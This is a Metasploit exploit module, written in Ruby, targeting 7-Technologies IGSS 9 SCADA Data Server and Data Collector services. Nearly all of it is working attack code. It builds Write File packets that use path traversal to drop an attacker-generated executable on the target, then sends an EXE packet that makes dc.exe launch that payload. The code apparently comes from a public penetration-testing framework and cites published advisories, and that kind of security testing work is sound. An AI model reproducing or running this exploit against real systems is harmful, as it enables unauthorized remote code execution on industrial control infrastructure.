7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities

##
# $Id: igss9_misc.rb 12773 2011-05-30 21:06:56Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::EXE

 def initialize(info={})
  super(update_info(info,
   'Name'           => "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",
   'Description'    => %q{
     This module exploits multiple vulnerabilities found on IGSS 9's Data Server and
    Data Collector services.  The initial approach is first by transferring our binary
    with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send
    an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run
    that payload with a CreateProcessA() function as a new thread.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision$",
   'Author'         =>
    [
     'Luigi Auriemma',  #Initial discovery, poc
     'sinn3r',          #Metasploit
    ],
   'References'     =>
    [
     [ 'URL', 'http://aluigi.altervista.org/adv/igss_1-adv.txt' ],  #Write File packet flaw
     [ 'URL', 'http://aluigi.altervista.org/adv/igss_8-adv.txt' ],  #EXE packet flaw
    ],
   'DefaultOptions'  =>
    {
     'ExitFunction' => "none",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     #Service packs do not have any influence on the exploit
     [ 'Windows XP', {} ],
     [ 'Windows 7', {} ],
     [ 'Windows Server 2003 / R2' , {} ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Mar 24 2011"))
   
   register_options(
    [
     Opt::RPORT(0, false),
     OptBool.new('VERBOSE', [false, 'Enable verbose output', false]),
    ], self.class)
 end

 def write_packets(data)
  pkts = []

  #Payload will be in C:\Documents and Settings\All Users\Application Data\7T\
  tmp = rand_text_alpha(1)
  filename = "#{tmp}.exe"

  data_size = data.length

  0.step(data_size, 870) do |s|
   #Each packet only contains 870 bytes of data
   chunk = data[s, 870]

   #Data size of this packet
   chunk_size = [chunk.length].pack('v')

   #Flag is set if this is our last chunk
   #Flag 0x01 will cause the server to close the connection
   flag = (chunk.length >= 870) ? "\x00" : "\x01"

   pkt  = "\x01\x00\x34\x12"
   pkt << "\x0D"                     #Opcode
   pkt << "\x00"*7
   pkt << flag                       #Flag
   pkt << "\x00\x00\x00"
   pkt << "\x02"                     #Command (Write File)
   pkt << "\x00\x00\x00"
   pkt << "../../../../#{filename}"  #Filename
   pkt << "\x00"*73
   pkt << "\x3E\x01\x01\x02"
   pkt << "\x00\x10"
   pkt << "\x00\x00"
   pkt << "\x78\x01\x08\x04"
   pkt << "\x78\x01\x08\x04"
   pkt << "\x00"*22
   pkt << chunk_size                 #Data size
   pkt << "\x00\x00"
   pkt << chunk                      #Data chunk

   #Add the total packet size to the header
   pkt_size = [pkt.length + 2].pack('v')
   pkt = pkt_size + pkt

   #Put this packet to the array
   pkts << pkt
  end

  return filename, pkts
 end

 def exe_packet(filename)
  #Original path seems to be: C:\Program Files\7T\IGSS32\V9.0\GSS
  #We'll just traverse our way back to C:\ as base
  base = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"

  pkt  = "\x00\x01"
  pkt << "\x00\x00\x00\x00\x00\x00\x00"
  pkt << "\x01"
  pkt << "\x00\x00"
  pkt << "\x0A"
  pkt << "\x00"*31
  pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#{filename}\""
  pkt << "\x00"*143

  return pkt
 end

 def exploit
  #Generate payload and our Write packets
  print_status("Generating payload...")
  p = generate_payload_exe
  fname, w_packets = write_packets(p)
  w_packets_count = w_packets.length.to_s
  print_status("#{p.length.to_s} bytes of payload to transfer (#{w_packets_count} packets)")

  #Generate our EXE packet
  e_packet = exe_packet(fname)

  #Create socket to igssdataserver.exe (12401)
  connect(true, {'RPORT'=>12401})

  #Count how many packets we've sent to track progress
  counter = 1

  #Send Write packets
  print_status("Sending Write packets...")

  w_packets.each do |packet|
   if datastore['VERBOSE']
    print_status("Sending packet #{counter.to_s}/#{w_packets_count}")
    counter += 1
   end
   sock.put(packet)
   res = sock.get_once() #Wait before we do the next sock.put again
  end

  #After the 0x01 flag is set, our connection will be closed by the server.
  disconnect

  #Now to port 12397 (nc.exe)
  connect(true, {'RPORT'=>12397})

  print_status("Attempt to execute our payload...")
  sock.put(e_packet)

  #We must delay disconnect() for a bit, otherwise dc.exe won't call
  #kernel32!CreateProcessA
  select(nil, nil, nil, 1)
  disconnect
 end
end